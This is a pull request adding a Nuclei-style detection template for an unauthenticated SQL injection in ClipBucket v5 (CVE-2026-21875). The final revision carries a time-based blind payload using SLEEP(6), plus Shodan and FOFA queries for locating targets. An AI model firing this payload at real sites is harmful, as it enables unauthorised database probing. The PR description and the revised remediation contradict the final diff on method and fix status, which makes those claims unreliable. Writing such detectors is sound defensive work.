### PR TITLE
Add CVE-2026-21875 template

### DIFF
--- a/http/cves/2026/CVE-2026-21875.yaml
+++ b/http/cves/2026/CVE-2026-21875.yaml
@@ -1,0 +1,42 @@
+id: CVE-2026-21875
+
+info:
+  name: ClipBucket v5 <= 5.5.2-#187 - Unauthenticated SQL Injection
+  author: str4k3r
+  severity: critical
+  description: |
+    ClipBucket v5 <= 5.5.2-#187 interpolates the unauthenticated `obj_id`
+    parameter of the add-comment action into a SQL query in `user_exists()`.
+    Sending a single quote for a non-existent object produces a database error
+    instead of the normal `channel_not_exist` response. The request does not
+    create a comment. The value is escaped in 5.5.3-#10 and later.
+  remediation: Upgrade ClipBucket v5 to 5.5.3-#10 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-21875
+    - https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392
+  classification:
+    cve-id: CVE-2026-21875
+    cwe-id: CWE-89
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,clipbucket,sqli,unauth
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/actions/ajax.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "mode=add_comment&type=channel&reply_to=1&obj_id=nuclei999%27&name=nuclei&email=nuclei%40gmail.com&comment=nuclei"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "A technical error occurred"

--- a/http/cves/2026/CVE-2026-21875.yaml
+++ b/http/cves/2026/CVE-2026-21875.yaml
@@ -1,19 +1,18 @@
 id: CVE-2026-21875
 
 info:
-  name: ClipBucket v5 <= 5.5.2-#187 - Unauthenticated SQL Injection
-  author: str4k3r
+  name: ClipBucket v5 <= 5.5.2 - Unauthenticated Blind SQL Injection
+  author: str4k3r,0x_Akoko
   severity: critical
   description: |
-    ClipBucket v5 <= 5.5.2-#187 interpolates the unauthenticated `obj_id`
-    parameter of the add-comment action into a SQL query in `user_exists()`.
-    Sending a single quote for a non-existent object produces a database error
-    instead of the normal `channel_not_exist` response. The request does not
-    create a comment. The value is escaped in 5.5.3-#10 and later.
-  remediation: Upgrade ClipBucket v5 to 5.5.3-#10 or later.
+    ClipBucket v5.5.2-#187 and below contain a blind SQL injection caused by unsanitized obj_id parameter in /actions/ajax.php used in user_exists function, letting attackers perform blind SQL injection remotely, exploit requires crafted POST request.
+  impact: |
+    Attackers can perform blind SQL injection to extract or manipulate database information remotely.
+  remediation: |
+    Update to the latest version once a fix is available.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-21875
     - https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-21875
   classification:
     cve-id: CVE-2026-21875
     cwe-id: CWE-89
@@ -21,22 +20,42 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
   metadata:
     verified: true
-    max-request: 1
-  tags: cve,cve2026,clipbucket,sqli,unauth
+    max-request: 2
+    vendor: macwarrior
+    product: clipbucket
+    shodan-query: http.html:"ClipBucket"
+    fofa-query: body="ClipBucket" || body="clipbucket"
+  tags: cve,cve2026,clipbucket,sqli,blind-sqli,time-based,unauth
+
+flow: http(1) && http(2)
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/actions/ajax.php"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: "mode=add_comment&type=channel&reply_to=1&obj_id=nuclei999%27&name=nuclei&email=nuclei%40gmail.com&comment=nuclei"
-    matchers-condition: and
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - "A technical error occurred"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(tolower(body), "clipbucket", "cb_v5", "clip-bucket")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 10s
+        POST /actions/ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mode=add_comment&type=channel&reply_to=1&obj_id=999999%27%20OR%20(userid%3D1%20AND%20SLEEP(6))--%20-&name=test&email=test%40gmail.com&comment=testing
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "channel_not_exist")'
+          - 'duration >= 6'
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-21875 in ClipBucket v5. A quote in the unauthenticated `obj_id` parameter reaches the `user_exists()` SQL query without escaping in affected releases; fixed releases escape the value.

## Detection

The template submits one intentionally malformed comment request for a non-existent object. The vulnerable build returns its database-error response, while the fixed build returns the normal `channel_not_exist` response. The probe does not create a comment or use a real object.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-21875
- https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-crpv-fmc4-j392

## Validation

Previously recorded native Nuclei v3.11.0 differential: vulnerable 5.5.2-#187 detected 3/3; fixed 5.5.3-#10 not detected 3/3. The final template was syntax-validated and quality-checked before submission.